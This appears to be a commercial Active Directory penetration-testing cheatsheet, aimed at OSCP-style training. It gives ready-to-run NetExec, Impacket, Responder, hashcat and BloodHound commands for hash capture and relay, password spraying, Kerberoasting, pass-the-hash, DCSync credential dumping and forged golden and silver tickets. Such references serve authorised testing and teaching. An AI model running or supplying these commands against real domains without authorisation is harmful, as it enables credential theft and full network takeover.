# Domain Enumeration
Map the domain before attacking. NetExec (formerly CrackMapExec) and Impacket are the workhorses. Start unauthenticated, then repeat with each credential you gather.
nxc smb 10.10.10.0/24enum4linux-ng -A DC_IPnxc smb DC_IP -u '' -p '' --usersldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountNamenxc smb DC_IP -u user -p pass --sharesnxc smb DC_IP -u user -p pass --pass-polGetADUsers.py -all domain/user:pass -dc-ip DC_IP# BloodHound — Map Paths to DA
BloodHound graphs the shortest attack path to Domain Admin. Collect the data, then let the graph plan your chain.
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c allnxc ldap DC_IP -u user -p pass --bloodhound --collection-method all.\SharpHound.exe -c All# LLMNR/NBT-NS Poisoning & NTLM Relay
With no credentials at all, poison name resolution to capture NetNTLM hashes — then crack or relay them.
responder -I eth0 -wvhashcat -m 5600 hashes.txt rockyou.txtntlmrelayx.py -tf targets.txt -smb2supportntlmrelayx.py -t ldap://DC_IP --escalate-user user# Password Spraying
Try one common password against every user — stay under the lockout threshold you dumped from the policy.
nxc smb DC_IP -u users.txt -p 'Season2026!' --continue-on-successkerbrute passwordspray -d domain.local users.txt 'Welcome1'nxc smb DC_IP -u users.txt -p passwords.txt --no-bruteforce--pass-pol first. Locking out accounts is noisy and disruptive — never spray blindly.# AS-REP Roasting
Accounts with “Do not require Kerberos pre-authentication” let you request an AS-REP and crack it offline — sometimes without any credentials.
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IPGetNPUsers.py domain/user:pass -request -dc-ip DC_IPhashcat -m 18200 asrep.txt rockyou.txt# Kerberoasting
Any authenticated user can request TGS tickets for SPN accounts. Service account passwords are often weak — crack them to escalate.
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -requestnxc ldap DC_IP -u user -p pass --kerberoasting kerb.txthashcat -m 13100 kerb.txt rockyou.txt# Pass-the-Hash
Authenticate with an NTLM hash instead of a password — no cracking required. The backbone of AD lateral movement.
nxc smb TARGET -u Administrator -H aad3b435b51404ee:HASHevil-winrm -i TARGET -u Administrator -H HASHpsexec.py -hashes :HASH Administrator@TARGETsecretsdump.py -hashes :HASH Administrator@TARGET# DCSync
With replication rights, ask a Domain Controller for any account's hash — including krbtgt, the key to Golden Tickets.
secretsdump.py domain/user:pass@DC_IPsecretsdump.py domain/user:pass@DC_IP -just-dc-user krbtgtnxc smb DC_IP -u user -p pass --ntds# Golden & Silver Tickets
Forge Kerberos tickets for total, persistent control. Golden = forged TGT (krbtgt hash). Silver = forged TGS for one service (service account hash).
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administratorexport KRB5CCNAME=Administrator.ccache; psexec.py -k -no-pass domain.local/Administrator@DCticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/server Administrator# Lateral Movement & Shells
Move between hosts with the credentials and tickets you've collected.
| Tool | Access | Notes |
|---|---|---|
| psexec.py | SYSTEM | Noisy, creates a service — most detected |
| wmiexec.py | User | Semi-interactive, no service (quieter) |
| smbexec.py | SYSTEM | No file dropped to disk |
| evil-winrm | User | Full PowerShell — needs WinRM (5985) |
| atexec.py | SYSTEM | Runs via scheduled task |
wmiexec.py domain/user:pass@TARGETevil-winrm -i TARGET -u user -p passnxc smb TARGETS.txt -u user -p pass -x "whoami"❓ Active Directory Pentest FAQ
Enumeration. Unauthenticated, run responder to capture hashes and enum4linux-ng/nxc against the domain. Once you have any valid creds, collect the attack surface with BloodHound to map paths to Domain Admin.
Requesting Kerberos TGS tickets for accounts with an SPN. The ticket is encrypted with the service account's hash, which you crack offline with hashcat -m 13100. Any domain user can request them — a classic low-to-high privilege attack.
Kerberoasting targets SPN accounts and cracks the TGS (-m 13100). AS-REP roasting targets accounts without Kerberos pre-auth and cracks the AS-REP (-m 18200) — and can work with no credentials if you know a valid username.
Authenticating with an NTLM hash instead of a plaintext password. Tools like nxc, evil-winrm and Impacket accept -H to use the hash directly — no cracking needed.
Abusing Directory Replication to ask a DC for any account's hash — including krbtgt and Domain Admins. It needs replication rights; secretsdump.py performs it remotely.
A forged TGT signed with the krbtgt hash. Since krbtgt signs every ticket, owning its hash lets you impersonate anyone (incl. Domain Admin) indefinitely — the ultimate persistence. Get the krbtgt hash via DCSync first.
It graphs the shortest paths to Domain Admin from AD data (users, groups, sessions, ACLs). Collect with SharpHound or bloodhound-python, then run “Shortest Path to Domain Admins”.
NetExec (ex-CrackMapExec), Impacket (secretsdump, GetUserSPNs, psexec, ntlmrelayx), Responder, BloodHound, evil-winrm and hashcat. Most ship with Kali Linux.
📚 Related Resources
- Linux Privilege Escalation Cheatsheet — 80+ techniques for the Linux hosts you'll meet in the domain
- Windows Privilege Escalation Cheatsheet — Get SYSTEM on a workstation before pivoting into the domain
- Hashcat Cheatsheet — Crack the Kerberoast and AS-REP hashes you harvest here
- Nmap Cheatsheet — Find the Domain Controller and its 88/389/445 services first
- OSCP Cheatsheet — The OSCP+ exam now includes a full Active Directory set
- Pentesting Glossary — Kerberos, NTLM, SPN, TGT and 60+ key terms defined
Turn your AD compromise into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 12,020+ commands?
This AD cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.
Start free →